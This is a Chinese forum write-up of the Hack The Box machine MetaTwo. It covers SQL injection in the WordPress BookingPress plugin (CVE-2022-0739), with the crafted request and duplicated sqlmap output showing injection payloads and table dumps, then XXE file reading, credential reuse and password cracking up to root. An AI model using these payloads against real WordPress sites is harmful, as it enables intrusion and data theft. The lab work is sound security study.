首页
社区
课程
招聘
[原创]HTB MetaTwo (easy)
发表于: 2022-12-4 00:41 951

[原创]HTB MetaTwo (easy)

2022-12-4 00:41
951

参考原文:https://0xdedinfosec.vercel.app/blog/hackthebox-metatwo-writeup
开启了21 22 80
网址为http://metapress.htb/
安装Wappalyzer可以看到网站信息
图片描述
查看源码后可以看到wordpress插件信息
图片描述
查找对应插件版本的漏洞
CVE-2022-0739
https ://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
该CVE有POC,根据POC先周到_wpnonce的值
图片描述
图片描述
bp抓包下来保存为admin.req
处理admin.req中的注入参数

列出所有databases

列出数据库 blog的table

dump wp_users表
图片描述
解一下密码

成功跑出了密码partylikearockstar

图片描述
跑一下目录

图片描述
使用manager账户密码在wp-admin登录
图片描述
查找对应版本的漏洞CVE-2021-29447
https://tryhackme.com/room/wordpresscve202129447
我们需要创建一个WAV文件,该文件将获取另一个名为的文件dedsec.dtd,其中包含我们的恶意代码

启动PHP服务器

图片描述
得到了/etc/passwd

图片描述
让我们获取 WordPresswp-config.php文件

图片描述
图片描述

得到了路径/var/www/metapress.htb/blog

图片描述图片描述

FTP用户创建
用户名:metapress.htb
密码:9NYS_ii@FyL_p5M2NvJ
图片描述
获得了send_email.php,查看文件获得Jnelson 用户密码Cb4_JmWM8zUZWMu@Ys
图片描述
ssh jnelson@10.10.11.186
图片描述
图片描述
图片描述
发现passpie
通过 google 搜索passpie得到一个Command-line password manager用 python 编写的工具https ://github.com/marcwebbie/passpie
图片描述
来 尝试破解key
图片描述
将key下载下来

图片描述
留下私钥
图片描述

转成john格式

图片描述
获得密码blink182
图片描述
获得root密码 p7qfAZt4_A1xo_0x
su root
cd ~
cat root.txt

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: metapress.htb
User-Agent: curl/7.84.0
Accept: */*
Content-Length: 185
Content-Type: application/x-www-form-urlencoded
Connection: close
 
action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: metapress.htb
User-Agent: curl/7.84.0
Accept: */*
Content-Length: 185
Content-Type: application/x-www-form-urlencoded
Connection: close
 
action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1
$ sqlmap -r admin.req -p total_service --batch
[*] starting @ 08:54:24 /2022-12-03/
 
[08:54:24] [INFO] parsing HTTP request from 'admin.req'
[08:54:25] [INFO] testing connection to the target URL
[08:54:28] [INFO] checking if the target is protected by some kind of WAF/IPS
[08:54:29] [INFO] testing if the target URL content is stable
[08:54:30] [INFO] target URL content is stable
[08:54:31] [WARNING] heuristic (basic) test shows that POST parameter 'total_service' might not be injectable
[08:54:33] [INFO] testing for SQL injection on POST parameter 'total_service'
[08:54:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:54:39] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[08:54:41] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[08:54:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[08:54:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[08:54:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[08:55:04] [INFO] testing 'Generic inline queries'
[08:55:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[08:55:05] [WARNING] time-based comparison requires larger statistical model, please wait. (done)                         
[08:55:12] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[08:55:18] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[08:55:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[08:55:36] [INFO] POST parameter 'total_service' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[08:55:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:55:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:56:06] [INFO] target URL appears to be UNION injectable with 9 columns
[08:56:12] [INFO] POST parameter 'total_service' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'total_service' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 68 HTTP(s) requests:
---
Parameter: total_service (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) AND (SELECT 9646 FROM (SELECT(SLEEP(5)))LdKc) AND (6557=6557
 
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[08:56:12] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[08:56:13] [INFO] fetched data logged to text files under '/home/xxx/.local/share/sqlmap/output/metapress.htb'
 
[*] ending @ 08:56:13 /2022-12-03/
$ sqlmap -r admin.req -p total_service --batch
[*] starting @ 08:54:24 /2022-12-03/
 
[08:54:24] [INFO] parsing HTTP request from 'admin.req'
[08:54:25] [INFO] testing connection to the target URL
[08:54:28] [INFO] checking if the target is protected by some kind of WAF/IPS
[08:54:29] [INFO] testing if the target URL content is stable
[08:54:30] [INFO] target URL content is stable
[08:54:31] [WARNING] heuristic (basic) test shows that POST parameter 'total_service' might not be injectable
[08:54:33] [INFO] testing for SQL injection on POST parameter 'total_service'
[08:54:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:54:39] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[08:54:41] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[08:54:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[08:54:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[08:54:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[08:55:04] [INFO] testing 'Generic inline queries'
[08:55:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[08:55:05] [WARNING] time-based comparison requires larger statistical model, please wait. (done)                         
[08:55:12] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[08:55:18] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[08:55:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[08:55:36] [INFO] POST parameter 'total_service' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[08:55:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:55:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:56:06] [INFO] target URL appears to be UNION injectable with 9 columns
[08:56:12] [INFO] POST parameter 'total_service' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'total_service' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 68 HTTP(s) requests:
---
Parameter: total_service (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) AND (SELECT 9646 FROM (SELECT(SLEEP(5)))LdKc) AND (6557=6557
 
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[08:56:12] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[08:56:13] [INFO] fetched data logged to text files under '/home/xxx/.local/share/sqlmap/output/metapress.htb'
 
[*] ending @ 08:56:13 /2022-12-03/
$ sqlmap -r admin.req -p total_service --dbs
[*] starting @ 08:56:32 /2022-12-03/
 
[08:56:32] [INFO] parsing HTTP request from 'admin.req'
[08:56:32] [INFO] resuming back-end DBMS 'mysql'
[08:56:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: total_service (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) AND (SELECT 9646 FROM (SELECT(SLEEP(5)))LdKc) AND (6557=6557
 
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[08:56:33] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[08:56:33] [INFO] fetching database names
available databases [2]:
[*] blog
[*] information_schema
 
[08:56:34] [INFO] fetched data logged to text files under '/home/xxx/.local/share/sqlmap/output/metapress.htb'
 
[*] ending @ 08:56:34 /2022-12-03/
$ sqlmap -r admin.req -p total_service --dbs
[*] starting @ 08:56:32 /2022-12-03/
 
[08:56:32] [INFO] parsing HTTP request from 'admin.req'
[08:56:32] [INFO] resuming back-end DBMS 'mysql'
[08:56:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: total_service (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) AND (SELECT 9646 FROM (SELECT(SLEEP(5)))LdKc) AND (6557=6557
 
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[08:56:33] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[08:56:33] [INFO] fetching database names
available databases [2]:
[*] blog
[*] information_schema
 
[08:56:34] [INFO] fetched data logged to text files under '/home/xxx/.local/share/sqlmap/output/metapress.htb'
 
[*] ending @ 08:56:34 /2022-12-03/
$ sqlmap -r admin.req -p total_service -D blog --tables
[*] starting @ 08:59:43 /2022-12-03/
 
[08:59:43] [INFO] parsing HTTP request from 'admin.req'
[08:59:43] [INFO] resuming back-end DBMS 'mysql'
[08:59:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: total_service (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) AND (SELECT 9646 FROM (SELECT(SLEEP(5)))LdKc) AND (6557=6557
 
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[08:59:45] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[08:59:45] [INFO] fetching tables for database: 'blog'
Database: blog
[27 tables]
+--------------------------------------+
| wp_bookingpress_appointment_bookings |
| wp_bookingpress_categories           |
| wp_bookingpress_customers            |
| wp_bookingpress_customers_meta       |
| wp_bookingpress_customize_settings   |
| wp_bookingpress_debug_payment_log    |
| wp_bookingpress_default_daysoff      |
| wp_bookingpress_default_workhours    |
| wp_bookingpress_entries              |
| wp_bookingpress_form_fields          |
| wp_bookingpress_notifications        |
| wp_bookingpress_payment_logs         |
| wp_bookingpress_services             |
| wp_bookingpress_servicesmeta         |
| wp_bookingpress_settings             |
| wp_commentmeta                       |
| wp_comments                          |
| wp_links                             |
| wp_options                           |
| wp_postmeta                          |
| wp_posts                             |
| wp_term_relationships                |
| wp_term_taxonomy                     |
| wp_termmeta                          |
| wp_terms                             |
| wp_usermeta                          |
| wp_users                             |
+--------------------------------------+
 
[08:59:47] [INFO] fetched data logged to text files under '/home/xxx/.local/share/sqlmap/output/metapress.htb'
 
[*] ending @ 08:59:47 /2022-12-03/
$ sqlmap -r admin.req -p total_service -D blog --tables
[*] starting @ 08:59:43 /2022-12-03/
 
[08:59:43] [INFO] parsing HTTP request from 'admin.req'
[08:59:43] [INFO] resuming back-end DBMS 'mysql'
[08:59:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: total_service (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) AND (SELECT 9646 FROM (SELECT(SLEEP(5)))LdKc) AND (6557=6557
 
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: action=bookingpress_front_get_category_services&_wpnonce=73608887bb&category_id=33&total_service=1) UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4b614a6e69454e444a727549686572497163796b646b6b6a4a4854527562474e6f4b576e5a505177,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[08:59:45] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[08:59:45] [INFO] fetching tables for database: 'blog'
Database: blog
[27 tables]
+--------------------------------------+
| wp_bookingpress_appointment_bookings |
| wp_bookingpress_categories           |
| wp_bookingpress_customers            |
| wp_bookingpress_customers_meta       |
| wp_bookingpress_customize_settings   |
| wp_bookingpress_debug_payment_log    |
| wp_bookingpress_default_daysoff      |
| wp_bookingpress_default_workhours    |
| wp_bookingpress_entries              |
| wp_bookingpress_form_fields          |
| wp_bookingpress_notifications        |
| wp_bookingpress_payment_logs         |
| wp_bookingpress_services             |
| wp_bookingpress_servicesmeta         |
| wp_bookingpress_settings             |
| wp_commentmeta                       |
| wp_comments                          |
| wp_links                             |

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

最后于 2022-12-29 14:29 被hml189编辑 ,原因:
收藏
免费 2
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//